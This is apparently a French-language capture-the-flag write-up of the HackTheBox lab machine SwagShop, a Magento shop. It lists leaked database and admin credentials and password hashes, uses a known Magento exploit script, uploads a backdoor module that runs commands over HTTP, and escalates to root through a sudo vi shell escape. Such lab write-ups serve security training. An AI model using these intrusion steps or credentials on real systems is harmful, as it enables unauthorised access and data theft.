HackTheBox - SwagShop

--- tags: HTB --- # HackTheBox - SwagShop ![](https://www.hackthebox.eu/storage/avatars/23477a54b0a750374e281656d69e7661_thumb.png) ## Nmap ```nmap >>> nmap -sC -sV -oA swagshop 10.10.10.140 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 21:50 CEST Nmap scan report for 10.10.10.140 Host is up (0.062s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home page Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.56 seconds ``` ## HTTP - Apache - Magento Ok y'a du cache leak sur `/var/cache`. ```json { "default_setup": { "connection": { "host": "localhost", "username": "root", "password": "fMVWh7bDHpgZkyfqQXreTjU9", "dbname": "swagshop", "initStatements": "SET NAMES utf8", "model": "mysql4", "type": "pdo_mysql", "active": "1" } } } ``` Il y a aussi les fichiers de sessions. On peut trouver l'utilisateur Harris qui semble etre admin sur le magento: ``` {s:7:"user_id";s:1:"1";s:9:"firstname";s:5:"Haris";s:8:"lastname";s:7:"Swagger";s:5:"email";s:17:"haris@htbswag.net";s:8:"username";s:5:"haris";s:8:"password";s:65:"8512c803ecf70d315b7a43a1c8918522:lBHk0AOG0ux8Ac4tcM1sSb1iD5BNnRJp" ``` Ou alors test user ``` ource";N;s:26:"*_resourceCollectionName";s:21:"admin/user_collection";s:12:"*_cacheTag";b:0;s:19:"*_dataSaveAllowed";b:1;s:15:"*_isObjectNew";N;s:8:"*_data";a:15:{s:7:"user_id";s:1:"4";s:9:"firstname";s:9:"Firstname";s:8:"lastname";s:8:"Lastname";s:5:"email";s:17:"email@example.com";s:8:"username";s:5:"forme";s:8:"password" ;s:35:"0a8335493c9fccd648ba53c601e3d67c:rp";s:7:"created";s:19:"2019-05-08 06:55:40";s:8:"modified";N;s:7:"logdate";s:19:"2019-05-08 12:09:32";s:6:"lognum";s:2:"15";s:15:"reload_acl_flag";s:1:"0";s:9:"is_active";s:1:"1";s:5:"extra";N;s:8:"rp_token";N;s:19:"rp_token_created_at";s:19:"2019-05-08 06:55:40";}s:18: ``` On crack le hash de forme ce qui done: `forme:rpforme` ## Passwords | Email | Username | Password | | :---------------- | :------- | :----------------------- | | email@example.com | forme | rpforme | | Email | root | fMVWh7bDHpgZkyfqQXreTjU9 | ## Admin Interfaces: - http://10.10.10.140/downloader/ - http://10.10.10.140/index.php/admin/Cms_Wysiwyg/directive/index/ - http://10.10.10.140/index.php/customer/account/login/ - http://10.10.10.140/index.php/admin/ Ok on utilise 37977.py et on se connecte avec forme:forme sur http://10.10.10.140/index.php/admin/ ```python 9 │ #Thanks to 10 │ # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON 11 │ import requests 12 │ import base64 13 │ import sys 14 │ 15 │ target = "http://10.10.10.140/index.php" ``` On est donc connecté en admin. On peut utiliser https://github.com/lavalamp-/LavaMagentoBD pour pop un shell :) On upload le tgz sur 'http://10.10.10.140/downloader/' ```bash py3 - tmux % http --form POST 'http://10.10.10.140/index.php/lavalamp/index' 'c=id' HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: Keep-Alive Content-Length: 54 Content-Type: text/html; charset=UTF-8 Date: Mon, 26 Aug 2019 11:49:04 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Keep-Alive: timeout=5, max=100 Pragma: no-cache Server: Apache/2.4.18 (Ubuntu) Set-Cookie: frontend=fc66dfgdqh3qup6ac278bnj2l7; expires=Mon, 26-Aug-2019 12:49:04 GMT; Max-Age=3600; path=/; domain=10.10.10.140; HttpOnly X-Frame-Options: SAMEORIGIN uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` > local.xml ```xml <config> <global> <install> <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date> </install> <crypt> <key><![CDATA[b355a9e0cd018d3f7f03607141518419]]></key> </crypt> <disable_local_modules>false</disable_local_modules> <resources> <db> <table_prefix><![CDATA[]]></table_prefix> </db> <default_setup> <connection> <host><![CDATA[localhost]]></host> <username><![CDATA[root]]></username> <password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password> <dbname><![CDATA[swagshop]]></dbname> <initStatements><![CDATA[SET NAMES utf8]]></initStatements> <model><![CDATA[mysql4]]></model> <type><![CDATA[pdo_mysql]]></type> <pdoType><![CDATA[]]></pdoType> <active>1</active> </connection> </default_setup> </resources> <session_save><![CDATA[files]]></session_save> </global> <admin> <routers> <adminhtml> <args> <frontName><![CDATA[admin]]></frontName> </args> </adminhtml> </routers> </admin> </config> ``` ## Own User Une fois qu'on a un shell: cat user.txt dans /home/haris `a448877277e82f05e5ddf9f90aefbac8` ## Own Root sudo vi /var/www/html/SakiiR :set shell=/bin/bash :!bash cat /root/root.txt